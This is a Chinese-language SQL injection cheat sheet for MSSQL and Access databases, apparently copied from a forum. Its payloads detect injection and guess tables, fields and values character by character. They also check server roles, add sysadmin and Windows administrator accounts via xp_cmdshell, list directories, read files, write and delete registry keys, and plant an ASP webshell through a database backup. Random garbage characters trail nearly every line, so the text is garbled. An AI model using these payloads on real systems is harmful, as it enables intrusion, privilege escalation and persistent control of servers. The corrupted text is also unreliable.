1.判断是否有注入;and 1=1 ;and 1=2 -�>qRGUW
2.初步判断是否是mssql ;and user>0 \@�PMj"p|:
skee�ec\V
3.注入参数是字符'and [查询条件] and ''=' MNU7OX�<�
pej-W/�R&�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' (f"Qz~R|6_
!�l�dE9 .
5.判断数据库系统 '[6]W)���f
�:��&5u�)�
;and (select count(*) from sysobjects)>0 mssql R�m3W&��hQ
��zecM|S�_
;and (select count(*) from msysobjects)>0 access 7r,�GdP��.
V@+���s�NM
j�A8Bmwt;w
MZV�bOcSAd
6.猜数据库 ;and (select Count(*) from [数据库名])>0 bBIN�js8C_
}vZfp5�Y��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Kez0�Bka�
�2�G|}E�NC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2��KXF�XR�
&2�:We�zDF
9.(1)猜字段的ascii值(access) w*'DlP�<�7
gD%�o0�jt"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 6&+dpr&c~=
�^��Zs�^��
(2)猜字段的ascii值(mssql) =l2 @'Y�Q
dw#pO�bH|`
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 H�z�iQ%Q�R
�YeJTB���}
10.测试权限结构(mssql) �`!N.1RP _
,��P�pVZq~
�Y<��^�Or
�U�p-�^km�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- yo5-�x"�ze
/p;�OZf��]
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4��T�uh]�5
k'.cl�^6Z8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- b��P�V}T`
e�8�SAjl"}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �tZ�) ,�Z<
�DFfh!KKR$
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- � �D��t5AG
%�eF��=;q�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- k� �FRV�W+
>]�Mhkf/=)
;and 1=(select IS_MEMBER('db_owner'));-- q%��s<y�+�
t`6~�ud��>
`j2|aX
%Z*
he�ES�
��[
11.添加mssql和系统的帐户 =J-&�us��X
`�)=sQ�2P
;exec master.dbo.sp_addlogin username;-- fuf'�r>1n�
;exec master.dbo.sp_password null,username,password;-- \Pfm�>$Ib=
L$Xkx03lz>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3DjX0D�x/l
�f#38QP-�T
;exec master.dbo.xp_cmdshell 'net user username password c[6�<U�kH7
�z/o�&r`no
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �\= 6dF,�V
��oj6=.� �
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �)CH\]>-FO
7CU<�R9�Kl
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- B�MzS3;1�_
�FLumI-se!
8N<2R��T8W
4�1�C6�ey
12.(1)遍历目录 it j&L <e�
�n�w�Jub$5
;create table dirs(paths varchar(100), id int) �!9S!zRy@�
R��-Tf�9?)
;insert dirs exec master.dbo.xp_dirtree 'c:\' fn�//�j7 j
F{&�0(6^p!
;and (select top 1 paths from dirs)>0 BC%V<6JBu(
Y>i
Qp/�k:
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �%B>>�J%��
z�4[��8*�}
-<�\hcV`&�
�rgv$M��nG
(2)遍历目录 Wsw�/��� D
�UW�g�PQ%}
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- d��~C��Z9h
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 of�_�Om$�
�5'rP-z~
u
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �P�1q��nU�
�A��h�V��V
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �+ �Vh�D]!
{bNKy���T
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �=,����U~�
Cj)*JZV��G
+o�6"��Z)
� N,ihQB5�
13.mssql中的存储过程 f2P2�wt.�$
�D��Ru#vC�
xp_regenumvalues 注册表根键, 子键 z��}$�!B.)
4n\O6$&�.x
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
?�D@WXE0a
p ^I#9�(PT
xp_regread 根键,子键,键值名 p?<T
�_�9e
�x��]"N�:t
;exec xp_regread ��;�:�~-=\
y�D^�Q&1�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 c_6~zb?k+m
Ql�nI��&o�
xp_regwrite 根键,子键, 值名, 值类型, 值 �%vWh1�-��
' '�|R$9\@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ib�uoq X`
|HTTT�z9R.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 =W�'{x�G}
�4^�w�`]�m
xp_regdeletevalue 根键,子键,值名 /kFw(�l_�.
c���sv;�u'
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 O1�z���3(�
$g�cC}tX��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��ESY\!X:|
*�edhJU�T�
Z=�144n� 1
���G8���CM
14.mssql的backup创建webshell pTcN8E&Unz
jW.I�kG[|
use model "�&TN}SB�W
wn>?r
?KIB
create table cmd(str image); {d�NWQE*\c
3Yf!H-(\uB
insert into cmd(str) values (''); S��4>�1�d-
1NU@�k6UHl
backup database model to disk='c:\l.asp'; �{��r[g�.@
X_�J(P?
�>�~��* w�
�X��=�X���
15.mssql内置函数 �AI*�1kxR
p�M_oIH'8:
;and (select @@version)>0 获得Windows的版本号 -* p�i�C�(
{#�TZ��FB�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 5�m���a(~5
g�5hMZPOmP
;and (select user_name())>0 爆当前系统的连接用户 ~�i9'9PHX@
�uKp�Wb1�(
;and (select db_name())>0 得到当前连接的数据库 6tT*b@�/_o
C�DD��Om8
A:Ki�t_�A�
Ub*�O*n�re
16.简洁的webshell J*��r%�b�+
Xp_�G9I,+�
use model �%D�<>F&�h
rT�YM���N
create table cmd(str image); �[f@[�g�E
-@G,R�y-\t
insert into cmd(str) values (''); 3�q$"�`��w
!I[�|\ 4j�
backup database model to disk='g:\wwwtest\l.asp';
